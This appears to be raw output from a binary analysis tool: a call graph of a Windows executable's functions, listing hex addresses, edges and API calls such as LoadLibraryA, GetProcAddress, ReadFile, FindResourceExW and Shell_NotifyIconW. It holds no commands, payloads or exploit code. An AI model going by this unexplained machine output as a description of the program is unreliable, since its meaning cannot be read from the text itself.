104916 884bdc 104917 884bec FreeLibrary 104916->104917 104918 884bf5 104916->104918 104917->104918 104920 8a525b 104918->104920 104919 884c03 2 API calls 104919->104916 104966 8a5270 104920->104966 104922 884dfc 104922->104722 104922->104723 105123 884c36 104923->105123 104926 884b8f 104927 884baa 104926->104927 104928 884ba1 FreeLibrary 104926->104928 104930 884c70 104927->104930 104928->104927 104929 884c36 2 API calls 104929->104926 104931 8a0db6 Mailbox 59 API calls 104930->104931 104932 884c85 104931->104932 104933 88522e 59 API calls 104932->104933 104934 884c91 _memmove 104933->104934 104935 884d89 104934->104935 104936 884dc1 104934->104936 104940 884ccc 104934->104940 105127 884e89 CreateStreamOnHGlobal 104935->105127 105138 8e991b 95 API calls 104936->105138 104937 884ec7 69 API calls 104946 884cd5 104937->104946 104940->104937 104941 884f0b 74 API calls 104941->104946 104942 884d69 104942->104730 104944 8bd8a7 104945 884ee5 85 API calls 104944->104945 104947 8bd8bb 104945->104947 104946->104941 104946->104942 104946->104944 105133 884ee5 104946->105133 104948 884f0b 74 API calls 104947->104948 104948->104942 104950 884f1d 104949->104950 104951 8bd9cd 104949->104951 105162 8a55e2 104950->105162 104954 8e9109 105360 8e8f5f 104954->105360 104956 8e911f 104956->104738 104958 8bd990 104957->104958 104959 884ed6 104957->104959 105365 8a5c60 104959->105365 104961 884ede 104963 884bd0 104962->104963 104964 884c0c LoadLibraryA 104962->104964 104963->104916 104963->104919 104964->104963 104965 884c1d GetProcAddress 104964->104965 104965->104963 104968 8a527c __initptd 104966->104968 104967 8a528f 105015 8a8b28 58 API calls __getptd_noexit 104967->105015 104968->104967 104970 8a52c0 104968->104970 104985 8b04e8 104970->104985 104971 8a5294 105016 8a8db6 9 API calls __swprintf 104971->105016 104974 8a52c5 104975 8a52db 104974->104975 104976 8a52ce 104974->104976 104978 8a5305 104975->104978 104979 8a52e5 104975->104979 105017 8a8b28 58 API calls __getptd_noexit 104976->105017 105000 8b0607 104978->105000 105018 8a8b28 58 API calls __getptd_noexit 104979->105018 104984 8a529f __initptd @_EH4_CallFilterFunc@8 104984->104922 104986 8b04f4 __initptd 104985->104986 104987 8a9c0b __lock 58 API calls 104986->104987 104988 8b0502 104987->104988 104989 8b057d 104988->104989 104995 8a9c93 __mtinitlocknum 58 API calls 104988->104995 104998 8b0576 104988->104998 105023 8a6c50 59 API calls __lock 104988->105023 105024 8a6cba RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 104988->105024 105025 8a881d 58 API calls 2 library calls 104989->105025 104992 8b0584 104992->104998 105026 8a9e2b InitializeCriticalSectionAndSpinCount 104992->105026 104993 8b05f3 __initptd 104993->104974 104995->104988 104997 8b05aa RtlEnterCriticalSection 104997->104998 105020 8b05fe 104998->105020 105009 8b0627 __wopenfile 105000->105009 105001 8b0641 105031 8a8b28 58 API calls __getptd_noexit 105001->105031 105003 8b07fc 105003->105001 105007 8b085f 105003->105007 105004 8b0646 105032 8a8db6 9 API calls __swprintf 105004->105032 105006 8a5310 105019 8a5332 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105006->105019 105028 8b85a1 105007->105028 105009->105001 105009->105003 105033 8a37cb 60 API calls 2 library calls 105009->105033 105011 8b07f5 105011->105003 105034 8a37cb 60 API calls 2 library calls 105011->105034 105013 8b0814 105013->105003 105035 8a37cb 60 API calls 2 library calls 105013->105035 105015->104971 105016->104984 105017->104984 105018->104984 105019->104984 105027 8a9d75 RtlLeaveCriticalSection 105020->105027 105022 8b0605 105022->104993 105023->104988 105024->104988 105025->104992 105026->104997 105027->105022 105036 8b7d85 105028->105036 105030 8b85ba 105030->105006 105031->105004 105032->105006 105033->105011 105034->105013 105035->105003 105039 8b7d91 __initptd 105036->105039 105037 8b7da7 105120 8a8b28 58 API calls __getptd_noexit 105037->105120 105039->105037 105041 8b7ddd 105039->105041 105040 8b7dac 105121 8a8db6 9 API calls __swprintf 105040->105121 105047 8b7e4e 105041->105047 105044 8b7df9 105122 8b7e22 RtlLeaveCriticalSection __unlock_fhandle 105044->105122 105046 8b7db6 __initptd 105046->105030 105048 8b7e6e 105047->105048 105049 8a44ea __wsopen_nolock 58 API calls 105048->105049 105053 8b7e8a 105049->105053 105050 8b7fc1 105051 8a8dc6 __invoke_watson 8 API calls 105050->105051 105052 8b85a0 105051->105052 105054 8b7d85 __wsopen_helper 103 API calls 105052->105054 105053->105050 105055 8b7ec4 105053->105055 105061 8b7ee7 105053->105061 105056 8b85ba 105054->105056 105057 8a8af4 __close 58 API calls 105055->105057 105056->105044 105058 8b7ec9 105057->105058 105059 8a8b28 __swprintf 58 API calls 105058->105059 105060 8b7ed6 105059->105060 105063 8a8db6 __swprintf 9 API calls 105060->105063 105062 8b7fa5 105061->105062 105070 8b7f83 105061->105070 105064 8a8af4 __close 58 API calls 105062->105064 105065 8b7ee0 105063->105065 105066 8b7faa 105064->105066 105065->105044 105067 8a8b28 __swprintf 58 API calls 105066->105067 105068 8b7fb7 105067->105068 105069 8a8db6 __swprintf 9 API calls 105068->105069 105069->105050 105071 8ad294 __alloc_osfhnd 61 API calls 105070->105071 105072 8b8051 105071->105072 105073 8b805b 105072->105073 105074 8b807e 105072->105074 105075 8a8af4 __close 58 API calls 105073->105075 105076 8b7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105074->105076 105077 8b8060 105075->105077 105084 8b80a0 105076->105084 105078 8a8b28 __swprintf 58 API calls 105077->105078 105081 8b806a 105078->105081 105079 8b811e GetFileType 105082 8b816b 105079->105082 105083 8b8129 GetLastError 105079->105083 105080 8b80ec GetLastError 105085 8a8b07 __dosmaperr 58 API calls 105080->105085 105086 8a8b28 __swprintf 58 API calls 105081->105086 105092 8ad52a __set_osfhnd 59 API calls 105082->105092 105087 8a8b07 __dosmaperr 58 API calls 105083->105087 105084->105079 105084->105080 105088 8b7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105084->105088 105089 8b8111 105085->105089 105086->105065 105090 8b8150 CloseHandle 105087->105090 105091 8b80e1 105088->105091 105094 8a8b28 __swprintf 58 API calls 105089->105094 105090->105089 105093 8b815e 105090->105093 105091->105079 105091->105080 105098 8b8189 105092->105098 105095 8a8b28 __swprintf 58 API calls 105093->105095 105094->105050 105096 8b8163 105095->105096 105096->105089 105097 8b8344 105097->105050 105100 8b8517 CloseHandle 105097->105100 105098->105097 105099 8b18c1 __lseeki64_nolock 60 API calls 105098->105099 105116 8b820a 105098->105116 105101 8b81f3 105099->105101 105102 8b7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105100->105102 105104 8a8af4 __close 58 API calls 105101->105104 105101->105116 105103 8b853e 105102->105103 105105 8b8572 105103->105105 105106 8b8546 GetLastError 105103->105106 105104->105116 105105->105050 105107 8a8b07 __dosmaperr 58 API calls 105106->105107 105110 8b8552 105107->105110 105108 8b0add __close_nolock 61 API calls 105108->105116 105109 8b0e5b 70 API calls __read_nolock 105109->105116 105111 8ad43d __free_osfhnd 59 API calls 105110->105111 105111->105105 105112 8b97a2 __chsize_nolock 82 API calls 105112->105116 105113 8ad886 __write 78 API calls 105113->105116 105114 8b83c1 105115 8b0add __close_nolock 61 API calls 105114->105115 105117 8b83c8 105115->105117 105116->105097 105116->105108 105116->105109 105116->105112 105116->105113 105116->105114 105118 8b18c1 60 API calls __lseeki64_nolock 105116->105118 105119 8a8b28 __swprintf 58 API calls 105117->105119 105118->105116 105119->105050 105120->105040 105121->105046 105122->105046 105124 884b83 105123->105124 105125 884c3f LoadLibraryA 105123->105125 105124->104926 105124->104929 105125->105124 105126 884c50 GetProcAddress 105125->105126 105126->105124 105128 884ec0 105127->105128 105129 884ea3 FindResourceExW 105127->105129 105128->104940 105129->105128 105130 8bd933 LoadResource 105129->105130 105130->105128 105131 8bd948 SizeofResource 105130->105131 105131->105128 105132 8bd95c LockResource 105131->105132 105132->105128 105134 884ef4 105133->105134 105137 8bd9ab 105133->105137 105139 8a584d 105134->105139 105136 884f02 105136->104946 105138->104940 105143 8a5859 __initptd 105139->105143 105140 8a586b 105152 8a8b28 58 API calls __getptd_noexit 105140->105152 105142 8a5891 105154 8a6c11 105142->105154 105143->105140 105143->105142 105145 8a5870 105153 8a8db6 9 API calls __swprintf 105145->105153 105149 8a587b __initptd 105149->105136 105150 8a58a6 105161 8a58c8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105150->105161 105152->105145 105153->105149 105155 8a6c43 RtlEnterCriticalSection 105154->105155 105156 8a6c21 105154->105156 105157 8a5897 105155->105157 105156->105155 105158 8a6c29 105156->105158 105160 8a57be 83 API calls 5 library calls 105157->105160 105159 8a9c0b __lock 58 API calls 105158->105159 105159->105157 105160->105150 105161->105149 105165 8a55fd 105162->105165 105164 884f2e 105164->104954 105166 8a5609 __initptd 105165->105166 105167 8a561f _memset 105166->105167 105168 8a564c 105166->105168 105170 8a5644 __initptd 105166->105170 105192 8a8b28 58 API calls __getptd_noexit 105167->105192 105169 8a6c11 __lock_file 59 API calls 105168->105169 105171 8a5652 105169->105171 105170->105164 105178 8a541d 105171->105178 105174 8a5639 105193 8a8db6 9 API calls __swprintf 105174->105193 105179 8a5453 105178->105179 105181 8a5438 _memset 105178->105181 105194 8a5686 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105179->105194 105180 8a5443 105290 8a8b28 58 API calls __getptd_noexit 105180->105290 105181->105179 105181->105180 105183 8a5493 105181->105183 105183->105179 105186 8a55a4 _memset 105183->105186 105195 8a46e6 105183->105195 105202 8b0e5b 105183->105202 105270 8b0ba7 105183->105270 105292 8b0cc8 58 API calls 3 library calls 105183->105292 105293 8a8b28 58 API calls __getptd_noexit 105186->105293 105191 8a5448 105291 8a8db6 9 API calls __swprintf 105191->105291 105192->105174 105193->105170 105194->105170 105196 8a46f0 105195->105196 105197 8a4705 105195->105197 105294 8a8b28 58 API calls __getptd_noexit 105196->105294 105197->105183 105199 8a46f5 105295 8a8db6 9 API calls __swprintf 105199->105295 105201 8a4700 105201->105183 105203 8b0e7c 105202->105203 105204 8b0e93 105202->105204 105305 8a8af4 58 API calls __getptd_noexit 105203->105305 105206 8b15cb 105204->105206 105211 8b0ecd 105204->105211 105321 8a8af4 58 API calls __getptd_noexit 105206->105321 105208 8b0e81 105306 8a8b28 58 API calls __getptd_noexit 105208->105306 105209 8b15d0 105322 8a8b28 58 API calls __getptd_noexit 105209->105322 105213 8b0ed5 105211->105213 105219 8b0eec 105211->105219 105307 8a8af4 58 API calls __getptd_noexit 105213->105307 105214 8b0ee1 105323 8a8db6 9 API calls __swprintf 105214->105323 105215 8b0e88 105215->105183 105217 8b0eda 105308 8a8b28 58 API calls __getptd_noexit 105217->105308 105219->105215 105220 8b0f01 105219->105220 105223 8b0f1b 105219->105223 105224 8b0f39 105219->105224 105309 8a8af4 58 API calls __getptd_noexit 105220->105309 105223->105220 105225 8b0f26 105223->105225 105310 8a881d 58 API calls 2 library calls 105224->105310 105296 8b5c6b 105225->105296 105227 8b0f49 105229 8b0f6c 105227->105229 105230 8b0f51 105227->105230 105313 8b18c1 60 API calls 3 library calls 105229->105313 105311 8a8b28 58 API calls __getptd_noexit 105230->105311 105231 8b103a 105233 8b10b3 ReadFile 105231->105233 105238 8b1050 GetConsoleMode 105231->105238 105236 8b1593 GetLastError 105233->105236 105237 8b10d5 105233->105237 105235 8b0f56 105312 8a8af4 58 API calls __getptd_noexit 105235->105312 105240 8b15a0 105236->105240 105246 8b1093 105236->105246 105237->105236 105244 8b10a5 105237->105244 105241 8b10b0 105238->105241 105242 8b1064 105238->105242 105319 8a8b28 58 API calls __getptd_noexit 105240->105319 105241->105233 105242->105241 105245 8b106a ReadConsoleW 105242->105245 105252 8b1377 105244->105252 105253 8b1099 105244->105253 105255 8b110a 105244->105255 105245->105244 105249 8b108d GetLastError 105245->105249 105246->105253 105314 8a8b07 58 API calls 3 library calls 105246->105314 105248 8b15a5 105320 8a8af4 58 API calls __getptd_noexit 105248->105320 105249->105246 105251 8a2d55 _free 58 API calls 105251->105215 105252->105253 105260 8b147d ReadFile 105252->105260 105253->105215 105253->105251 105256 8b1176 ReadFile 105255->105256 105262 8b11f7 105255->105262 105257 8b1197 GetLastError 105256->105257 105266 8b11a1 105256->105266 105257->105266 105258 8b12b4 105264 8b1264 MultiByteToWideChar 105258->105264 105317 8b18c1 60 API calls 3 library calls 105258->105317 105259 8b12a4 105316 8a8b28 58 API calls __getptd_noexit 105259->105316 105261 8b14a0 GetLastError 105260->105261 105269 8b14ae 105260->105269 105261->105269 105262->105253 105262->105258 105262->105259 105262->105264 105264->105249 105264->105253 105266->105255 105315 8b18c1 60 API calls 3 library calls 105266->105315 105269->105252 105318 8b18c1 60 API calls 3 library calls 105269->105318 105271 8b0bb2 105270->105271 105274 8b0bc7 105270->105274 105357 8a8b28 58 API calls __getptd_noexit 105271->105357 105273 8b0bb7 105358 8a8db6 9 API calls __swprintf 105273->105358 105276 8b0bfc 105274->105276 105284 8b0bc2 105274->105284 105359 8b5fe4 58 API calls __malloc_crt 105274->105359 105278 8a46e6 __flsbuf 58 API calls 105276->105278 105279 8b0c10 105278->105279 105324 8b0d47 105279->105324 105281 8b0c17 105282 8a46e6 __flsbuf 58 API calls 105281->105282 105281->105284 105283 8b0c3a 105282->105283 105283->105284 105285 8a46e6 __flsbuf 58 API calls 105283->105285 105284->105183 105286 8b0c46 105285->105286 105286->105284 105287 8a46e6 __flsbuf 58 API calls 105286->105287 105288 8b0c53 105287->105288 105289 8a46e6 __flsbuf 58 API calls 105288->105289 105289->105284 105290->105191 105291->105179 105292->105183 105293->105191 105294->105199 105295->105201 105297 8b5c83 105296->105297 105298 8b5c76 105296->105298 105300 8b5c8f 105297->105300 105301 8a8b28 __swprintf 58 API calls 105297->105301 105299 8a8b28 __swprintf 58 API calls 105298->105299 105302 8b5c7b 105299->105302 105300->105231 105303 8b5cb0 105301->105303 105302->105231 105304 8a8db6 __swprintf 9 API calls 105303->105304 105304->105302 105305->105208 105306->105215 105307->105217 105308->105214 105309->105217 105310->105227 105311->105235 105312->105215 105313->105225 105314->105253 105315->105266 105316->105253 105317->105264 105318->105269 105319->105248 105320->105253 105321->105209 105322->105214 105323->105215 105325 8b0d53 __initptd 105324->105325 105326 8b0d60 105325->105326 105327 8b0d77 105325->105327 105328 8a8af4 __close 58 API calls 105326->105328 105329 8b0e3b 105327->105329 105332 8b0d8b 105327->105332 105331 8b0d65 105328->105331 105330 8a8af4 __close 58 API calls 105329->105330 105333 8b0dae 105330->105333 105334 8a8b28 __swprintf 58 API calls 105331->105334 105335 8b0da9 105332->105335 105336 8b0db6 105332->105336 105343 8a8b28 __swprintf 58 API calls 105333->105343 105340 8b0d6c __initptd 105334->105340 105337 8a8af4 __close 58 API calls 105335->105337 105338 8b0dd8 105336->105338 105339 8b0dc3 105336->105339 105337->105333 105342 8ad206 ___lock_fhandle 59 API calls 105338->105342 105341 8a8af4 __close 58 API calls 105339->105341 105340->105281 105344 8b0dc8 105341->105344 105345 8b0dde 105342->105345 105349 8b0dd0 105343->105349 105346 8a8b28 __swprintf 58 API calls 105344->105346 105347 8b0df1 105345->105347 105348 8b0e04 105345->105348 105346->105349 105350 8b0e5b __read_nolock 70 API calls 105347->105350 105352 8a8b28 __swprintf 58 API calls 105348->105352 105351 8a8db6 __swprintf 9 API calls 105349->105351 105354 8b0dfd 105350->105354 105351->105340 105353 8b0e09 105352->105353 105355 8a8af4 __close 58 API calls 105353->105355 105356 8b0e33 __read RtlLeaveCriticalSection 105354->105356 105355->105354 105356->105340 105357->105273 105358->105284 105359->105276 105363 8a520a GetSystemTimeAsFileTime 105360->105363 105362 8e8f6e 105362->104956 105364 8a5238 __aulldiv 105363->105364 105364->105362 105366 8a5c6c __initptd 105365->105366 105367 8a5c7e 105366->105367 105368 8a5c93 105366->105368 105379 8a8b28 58 API calls __getptd_noexit 105367->105379 105369 8a6c11 __lock_file 59 API calls 105368->105369 105372 8a5c99 105369->105372 105371 8a5c83 105380 8a8db6 9 API calls __swprintf 105371->105380 105381 8a58d0 67 API calls 6 library calls 105372->105381 105375 8a5c8e __initptd 105375->104961 105376 8a5ca4 105382 8a5cc4 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105376->105382 105378 8a5cb6 105378->105375 105379->105371 105380->105375 105381->105376 105382->105378 105383->104787 105384->104833 105385->104835 105421 8e9748 __tzset_nolock _wcscmp 105416->105421 105417 8e9210 105417->104867 105422 8a40fb 58 API calls __wsplitpath_helper 105417->105422 105418 884f0b 74 API calls 105418->105421 105419 8e9109 GetSystemTimeAsFileTime 105419->105421 105420 884ee5 85 API calls 105420->105421 105421->105417 105421->105418 105421->105419 105421->105420 105422->104869 105423->104877 105750 8e3c3e 105749->105750 105751 8e4475 FindFirstFileW 105749->105751 105750->104495 105751->105750 105752 8e448a FindClose 105751->105752 105752->105750 105754 88818f 105753->105754 105757 8881aa 105753->105757 105755 887e4f 59 API calls 105754->105755 105756 888197 CharUpperBuffW 105755->105756 105756->105757 105757->104503 105759 88f251 105758->105759 105760 88f272 105759->105760 105886 8e9e4a 89 API calls 4 library calls 105759->105886 105760->104555 105763 88838d 105762->105763 105764 8bedbd 105762->105764 105765 8a0db6 Mailbox 59 API calls 105763->105765 105766 888394 105765->105766 105767 8883b5 105766->105767 105887 888634 59 API calls Mailbox 105766->105887 105767->104520 105767->104529 105770 8c4cc3 105769->105770 105784 8909f5 105769->105784 105928 8e9e4a 89 API calls 4 library calls 105770->105928 105772 890cfa 105772->104549 105774 890ee4 105774->105772 105776 890ef1 105774->105776 105926 891093 331 API calls Mailbox 105776->105926 105777 890a4b PeekMessageW 105839 890a05 Mailbox 105777->105839 105779 890ef8 LockWindowUpdate DestroyWindow GetMessageW 105779->105772 105782 890f2a 105779->105782 105781 8c4e81 Sleep 105781->105839 105785 8c5c58 TranslateMessage DispatchMessageW GetMessageW 105782->105785 105783 890ce4 105783->105772 105925 891070 10 API calls Mailbox 105783->105925 105784->105839 105929 889e5d 60 API calls 105784->105929 105930 8d6349 331 API calls 105784->105930 105785->105785 105787 8c5c88 105785->105787 105787->105772 105788 890e43 PeekMessageW 105788->105839 105789 890ea5 TranslateMessage DispatchMessageW 105789->105788 105790 8c4d50 TranslateAcceleratorW 105790->105788 105790->105839 105791 889e5d 60 API calls 105791->105839 105792 890d13 timeGetTime 105792->105839 105793 8c581f WaitForSingleObject 105796 8c583c GetExitCodeProcess CloseHandle 105793->105796 105793->105839 105795 8a0db6 59 API calls Mailbox 105795->105839 105830 890f95 105796->105830 105797 890e5f Sleep 105829 890e70 Mailbox 105797->105829 105798 888047 59 API calls 105798->105839 105799 887667 59 API calls 105799->105829 105800 8c5af8 Sleep 105800->105829 105802 8a049f timeGetTime 105802->105829 105804 890f4e timeGetTime 105927 889e5d 60 API calls 105804->105927 105807 8c5b8f GetExitCodeProcess 105811 8c5bbb CloseHandle 105807->105811 105812 8c5ba5 WaitForSingleObject 105807->105812 105808 889837 84 API calls 105808->105839 105809 905f25 110 API calls 105809->105829 105810 88b7dd 109 API calls 105810->105829 105811->105829 105812->105811 105812->105839 105815 8c5874 105815->105830 105816 8c5078 Sleep 105816->105839 105817 8c5c17 Sleep 105817->105839 105819 887de1 59 API calls 105819->105829 105823 889ea0 304 API calls 105823->105839 105825 88f460 304 API calls 105825->105839 105826 88fce0 304 API calls 105826->105839 105829->105799 105829->105802 105829->105807 105829->105809 105829->105810 105829->105815 105829->105816 105829->105817 105829->105819 105829->105830 105829->105839 105936 8e2408 60 API calls 105829->105936 105937 889e5d 60 API calls 105829->105937 105938 8889b3 69 API calls Mailbox 105829->105938 105939 88b73c 331 API calls 105829->105939 105940 8d64da 60 API calls 105829->105940 105941 8e5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105829->105941 105942 8e3c55 66 API calls Mailbox 105829->105942 105830->104549 105831 8e9e4a 89 API calls 105831->105839 105832 8884c0 69 API calls 105832->105839 105834 8889b3 69 API calls 105834->105839 105835 889c90 59 API calls Mailbox 105835->105839 105836 8882df 59 API calls 105836->105839 105837 8d617e 59 API calls Mailbox 105837->105839 105838 887de1 59 API calls 105838->105839 105839->105777 105839->105781 105839->105783 105839->105788 105839->105789 105839->105790 105839->105791 105839->105792 105839->105793 105839->105795 105839->105797 105839->105798 105839->105800 105839->105804 105839->105808 105839->105823 105839->105825 105839->105826 105839->105829 105839->105830 105839->105831 105839->105832 105839->105834 105839->105835 105839->105836 105839->105837 105839->105838 105840 8c55d5 VariantClear 105839->105840 105841 8d6e8f 59 API calls 105839->105841 105842 8c566b VariantClear 105839->105842 105843 888cd4 59 API calls Mailbox 105839->105843 105844 8c5419 VariantClear 105839->105844 105845 88b73c 304 API calls 105839->105845 105888 88e6a0 105839->105888 105919 8831ce 105839->105919 105924 88e420 331 API calls 105839->105924 105931 906018 59 API calls 105839->105931 105932 8e9a15 59 API calls Mailbox 105839->105932 105933 8dd4f2 59 API calls 105839->105933 105934 8d60ef 59 API calls 2 library calls 105839->105934 105935 888401 59 API calls 105839->105935 105840->105839 105841->105839 105842->105839 105843->105839 105844->105839 105845->105839 105847 8beda1 105846->105847 105850 8882f2 105846->105850 105848 8bedb1 105847->105848 105951 8d61a4 59 API calls 105847->105951 105851 88831c 105850->105851 105852 8885c0 59 API calls 105850->105852 105856 888339 Mailbox 105850->105856 105853 888322 105851->105853 105854 8885c0 59 API calls 105851->105854 105852->105851 105855 889c90 Mailbox 59 API calls 105853->105855 105853->105856 105854->105853 105855->105856 105856->104579 105857->104573 105858->104573 105859->104504 105860->104515 105861->104512 105862->104515 105863->104515 105864->104516 105865->104530 105866->104525 105867->104525 105869 8885ce 105868->105869 105875 8885f6 105868->105875 105870 8885dc 105869->105870 105871 8885c0 59 API calls 105869->105871 105872 8885e2 105870->105872 105873 8885c0 59 API calls 105870->105873 105871->105870 105874 889c90 Mailbox 59 API calls 105872->105874 105872->105875 105873->105872 105874->105875 105875->104528 105876->104573 105877->104573 105878->104573 105880 8884cb 105879->105880 105882 8884f2 105880->105882 105952 8889b3 69 API calls Mailbox 105880->105952 105882->104557 105883->104515 105884->104558 105885->104515 105886->105760 105887->105767 105889 88e6d5 105888->105889 105890 8c3aa9 105889->105890 105892 88e73f 105889->105892 105903 88e799 105889->105903 105891 889ea0 331 API calls 105890->105891 105893 8c3abe 105891->105893 105896 887667 59 API calls 105892->105896 105892->105903 105914 88e970 Mailbox 105893->105914 105944 8e9e4a 89 API calls 4 library calls 105893->105944 105894 887667 59 API calls 105894->105903 105898 8c3b04 105896->105898 105897 8a2d40 __cinit 67 API calls 105897->105903 105900 8a2d40 __cinit 67 API calls 105898->105900 105899 8c3b26 105899->105839 105900->105903 105901 8e9e4a 89 API calls 105901->105914 105902 8884c0 69 API calls 105902->105914 105903->105894 105903->105897 105903->105899 105904 88e95a 105903->105904 105903->105914 105904->105914 105945 8e9e4a 89 API calls 4 library calls 105904->105945 105906 888d40 59 API calls 105906->105914 105907 889ea0 331 API calls 105907->105914 105908 88ea78 105908->105839 105909 88f195 105949 8e9e4a 89 API calls 4 library calls 105909->105949 105910 889c90 Mailbox 59 API calls 105910->105914 105914->105901 105914->105902 105914->105906 105914->105907 105914->105908 105914->105909 105914->105910 105943 887f77 59 API calls 2 library calls 105914->105943 105946 8d6e8f 59 API calls 105914->105946 105947 8fc5c3 331 API calls 105914->105947 105948 8fb53c 331 API calls Mailbox 105914->105948 105950 8f93c6 331 API calls Mailbox 105914->105950 105918 8c3e25 105918->105839 105920 883212 105919->105920 105921 8831e0 105919->105921 105920->105839 105921->105920 105922 883205 IsDialogMessageW 105921->105922 105923 8bcf32 GetClassLongW 105921->105923 105922->105920 105922->105921 105923->105921 105923->105922 105924->105839 105925->105774 105926->105779 105927->105839 105928->105784 105929->105784 105930->105784 105931->105839 105932->105839 105933->105839 105934->105839 105935->105839 105936->105829 105937->105829 105938->105829 105939->105829 105940->105829 105941->105829 105942->105829 105943->105914 105944->105914 105945->105914 105946->105914 105947->105914 105948->105914 105949->105918 105950->105914 105951->105848 105952->105882 105954 8d60e8 105953->105954 105955 8d60cb 105953->105955 105954->104314 105955->105954 105957 8d60ab 59 API calls Mailbox 105955->105957 105957->105955 105958->104320 105959->104327 105960->104327 105961 883633 105962 88366a 105961->105962 105963 883688 105962->105963 105964 8836e7 105962->105964 106002 8836e5 105962->106002 105968 88374b PostQuitMessage 105963->105968 105969 883695 105963->105969 105966 8836ed 105964->105966 105967 8bd0cc 105964->105967 105965 8836ca NtdllDefWindowProc_W 105975 8836d8 105965->105975 105970 8836f2 105966->105970 105971 883715 SetTimer RegisterClipboardFormatW 105966->105971 106016 891070 10 API calls Mailbox 105967->106016 105968->105975 105973 8836a0 105969->105973 105974 8bd154 105969->105974 105976 8836f9 KillTimer 105970->105976 105977 8bd06f 105970->105977 105971->105975 105979 88373e CreatePopupMenu 105971->105979 105980 8836a8 105973->105980 105981 883755 105973->105981 106032 8e2527 71 API calls _memset 105974->106032 106013 88443a Shell_NotifyIconW _memset 105976->106013 105984 8bd0a8 MoveWindow 105977->105984 105985 8bd074 105977->105985 105978 8bd0f3 106017 891093 331 API calls Mailbox 105978->106017 105979->105975 105988 8bd139 105980->105988 105989 8836b3 105980->105989 106006 8844a0 105981->106006 105984->105975 105991 8bd078 105985->105991 105992 8bd097 SetFocus 105985->105992 105988->105965 106031 8d7c36 59 API calls Mailbox 105988->106031 105994 8836be 105989->105994 105995 8bd124 105989->105995 105990 8bd166 105990->105965 105990->105975 105991->105994 105996 8bd081 105991->105996 105992->105975 105993 88370c 106014 883114 DeleteObject DestroyWindow Mailbox 105993->106014 105994->105965 106018 88443a Shell_NotifyIconW _memset 105994->106018 106030 8e2d36 81 API calls _memset 105995->106030 106015 891070 10 API calls Mailbox 105996->106015 106001 8bd134 106001->105975 106002->105965 106004 8bd118 106019 88434a 106004->106019 106007 884539 106006->106007 106008 8844b7 _memset 106006->106008 106007->105975 106033 88407c 106008->106033 106010 884522 KillTimer SetTimer 106010->106007 106011 8844de 106011->106010 106012 8bd4ab Shell_NotifyIconW 106011->106012 106012->106010 106013->105993 106014->105975 106015->105975 106016->105978 106017->105994 106018->106004 106020 884375 _memset 106019->106020 106055 884182 106020->106055 106023 8843fa 106025 884430 Shell_NotifyIconW 106023->106025 106026 884414 Shell_NotifyIconW 106023->106026 106027 884422 106025->106027 106026->106027 106028 88407c 61 API calls 106027->106028 106029 884429 106028->106029 106029->106002 106030->106001 106031->106002 106032->105990 106034 884098 106033->106034 106054 88416f Mailbox 106033->106054 106035 887a16 59 API calls 106034->106035 106036 8840a6 106035->106036 106037 8bd3c8 LoadStringW 106036->106037 106038 8840b3 106036->106038 106041 8bd3e2 106037->106041 106039 887bcc 59 API calls 106038->106039 106040 8840c8 106039->106040 106040->106041 106042 8840d9 106040->106042 106043 887b2e 59 API calls 106041->106043 106044 8840e3 106042->106044 106045 884174 106042->106045 106048 8bd3ec 106043->106048 106047 887b2e 59 API calls 106044->106047 106046 888047 59 API calls 106045->106046 106049 8840ed _memset _wcscpy 106046->106049 106047->106049 106048->106049 106050 887cab 59 API calls 106048->106050 106053 884155 Shell_NotifyIconW 106049->106053 106051 8bd40e 106050->106051 106052 887cab 59 API calls 106051->106052 106052->106049 106053->106054 106054->106011 106056 8bd423 106055->106056 106057 884196 106055->106057 106056->106057 106058 8bd42c DestroyCursor 106056->106058 106057->106023 106059 8e2f94 62 API calls _W_store_winword 106057->106059 106058->106057 106059->106023 106060 8bfe27 106073 89f944 106060->106073 106062 8bfe3d 106063 8bfebe 106062->106063 106064 8bfe53 106062->106064 106068 88fce0 331 API calls 106063->106068 106082 889e5d 60 API calls 106064->106082 106066 8bfe92 106067 8c089c 106066->106067 106070 8bfe9a 106066->106070 106084 8e9e4a 89 API calls 4 library calls 106067->106084 106072 8bfeb2 Mailbox 106068->106072 106083 8e834f 59 API calls Mailbox 106070->106083 106074 89f950 106073->106074 106075 89f962 106073->106075 106076 889d3c 60 API calls 106074->106076 106077 89f968 106075->106077 106078 89f991 106075->106078 106081 89f95a 106076->106081 106079 8a0db6 Mailbox 59 API calls 106077->106079 106080 889d3c 60 API calls 106078->106080 106079->106081 106080->106081 106081->106062 106082->106066 106083->106072 106084->106072 106085 8a7c56 106086 8a7c62 __initptd 106085->106086 106122 8a9e08 GetStartupInfoW 106086->106122 106089 8a7c67 106124 8a8b7c GetProcessHeap 106089->106124 106090 8a7cbf 106091 8a7cca 106090->106091 106207 8a7da6 58 API calls 3 library calls 106090->106207 106125 8a9ae6 106091->106125 106094 8a7cd0 106095 8a7cdb __RTC_Initialize 106094->106095 106208 8a7da6 58 API calls 3 library calls 106094->106208 106146 8ad5d2 106095->106146 106098 8a7cea 106099 8a7cf6 GetCommandLineW 106098->106099 106209 8a7da6 58 API calls 3 library calls 106098->106209 106165 8b4f23 GetEnvironmentStringsW 106099->106165 106103 8a7cf5 106103->106099 106105 8a7d10 106106 8a7d1b 106105->106106 106210 8a30b5 58 API calls 3 library calls 106105->106210 106175 8b4d58 106106->106175 106109 8a7d21 106110 8a7d2c 106109->106110 106211 8a30b5 58 API calls 3 library calls 106109->106211 106189 8a30ef 106110->106189 106113 8a7d34 106114 8a7d3f __wwincmdln 106113->106114 106212 8a30b5 58 API calls 3 library calls 106113->106212 106195 8847d0 106114->106195 106117 8a7d53 106118 8a7d62 106117->106118 106213 8a3358 58 API calls _doexit 106117->106213 106214 8a30e0 58 API calls _doexit 106118->106214 106121 8a7d67 __initptd 106123 8a9e1e 106122->106123 106123->106089 106124->106090 106215 8a3187 36 API calls 2 library calls 106125->106215 106127 8a9aeb 106216 8a9d3c InitializeCriticalSectionAndSpinCount ___lock_fhandle 106127->106216 106129 8a9af0 106130 